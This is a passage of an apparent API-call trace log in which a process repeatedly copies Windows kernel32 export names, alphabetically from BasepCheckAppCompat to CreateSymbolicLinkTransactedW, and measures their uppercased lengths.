lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0158.259] lstrcpyA (in: lpString1=0x239f158, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0158.259] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0158.259] lstrcpyA (in: lpString1=0x239f158, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0158.259] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0158.259] lstrcpyA (in: lpString1=0x239f158, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0158.259] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0158.259] lstrcpyA (in: lpString1=0x239f158, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0158.259] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0158.259] lstrcpyA (in: lpString1=0x239f158, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0158.260] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0158.260] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0158.260] lstrlenA (lpString="BEEP") returned 4 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0158.260] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0158.260] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0158.260] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0158.260] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0158.260] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0158.260] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0158.260] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0158.260] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0158.260] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0158.260] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0158.260] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0158.260] lstrlenA (lpString="CANCELIO") returned 8 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0158.260] lstrlenA (lpString="CANCELIOEX") returned 10 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0158.260] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0158.260] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0158.260] lstrcpyA (in: lpString1=0x239f158, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0158.261] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0158.261] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0158.261] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0158.261] lstrlenA (lpString="CHECKELEVATION") returned 14 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0158.261] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0158.261] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0158.261] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0158.261] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0158.261] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0158.261] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0158.261] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0158.261] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0158.261] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0158.261] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0158.261] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0158.261] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0158.261] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0158.261] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0158.261] lstrcpyA (in: lpString1=0x239f158, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0158.261] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0158.262] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0158.262] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0158.262] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0158.262] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0158.262] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0158.262] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0158.262] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0158.262] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0158.262] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0158.262] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0158.262] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0158.262] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0158.262] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0158.262] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0158.262] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0158.262] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0158.262] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0158.262] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0158.262] lstrcpyA (in: lpString1=0x239f158, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0158.263] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0158.263] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0158.263] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0158.263] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0158.263] lstrlenA (lpString="COPYCONTEXT") returned 11 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0158.263] lstrlenA (lpString="COPYFILEA") returned 9 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0158.263] lstrlenA (lpString="COPYFILEEXA") returned 11 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0158.263] lstrlenA (lpString="COPYFILEEXW") returned 11 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0158.263] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0158.263] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0158.263] lstrlenA (lpString="COPYFILEW") returned 9 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0158.263] lstrlenA (lpString="COPYLZFILE") returned 10 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0158.263] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0158.263] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0158.263] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0158.263] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0158.263] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0158.263] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0158.263] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0158.263] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0158.264] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0158.264] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0158.264] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0158.264] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0158.264] lstrlenA (lpString="CREATEEVENTA") returned 12 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0158.264] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0158.264] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0158.264] lstrlenA (lpString="CREATEEVENTW") returned 12 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0158.264] lstrlenA (lpString="CREATEFIBER") returned 11 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0158.264] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0158.264] lstrlenA (lpString="CREATEFILEA") returned 11 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0158.264] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0158.264] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0158.264] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0158.264] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0158.264] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0158.264] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0158.264] lstrlenA (lpString="CREATEFILEW") returned 11 [0158.264] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0158.264] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0158.265] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0158.265] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0158.265] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0158.265] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0158.265] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0158.265] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0158.265] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0158.265] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0158.265] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0158.265] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0158.265] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0158.265] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0158.265] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0158.265] lstrlenA (lpString="CREATEJOBSET") returned 12 [0158.265] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0158.265] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0158.265] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0158.265] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0158.265] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0158.265] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0158.265] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0158.265] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0158.265] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0158.265] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0158.265] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0158.265] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0158.265] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0158.265] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0158.265] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0158.265] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0158.265] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0158.265] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0158.265] lstrcpyA (in: lpString1=0x239f158, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0158.266] lstrlenA (lpString="CREATEPIPE") returned 10 [0158.266] lstrcpyA (in: lpString1=0x239f158, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0158.266] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0158.266] lstrcpyA (in: lpString1=0x239f158, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0158.266] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0158.266] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0158.266] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0158.266] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0158.266] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0158.266] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0158.266] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0158.266] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0158.266] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0158.266] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0158.266] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0158.266] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0158.266] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0158.266] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0158.266] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0158.266] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0158.266] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0158.266] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0158.266] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0158.266] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0158.266] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0158.266] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0158.266] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0158.267] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0158.267] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0158.267] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0158.267] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0158.267] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0158.267] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0158.267] lstrcpyA (in: lpString1=0x239f158, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0158.267] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 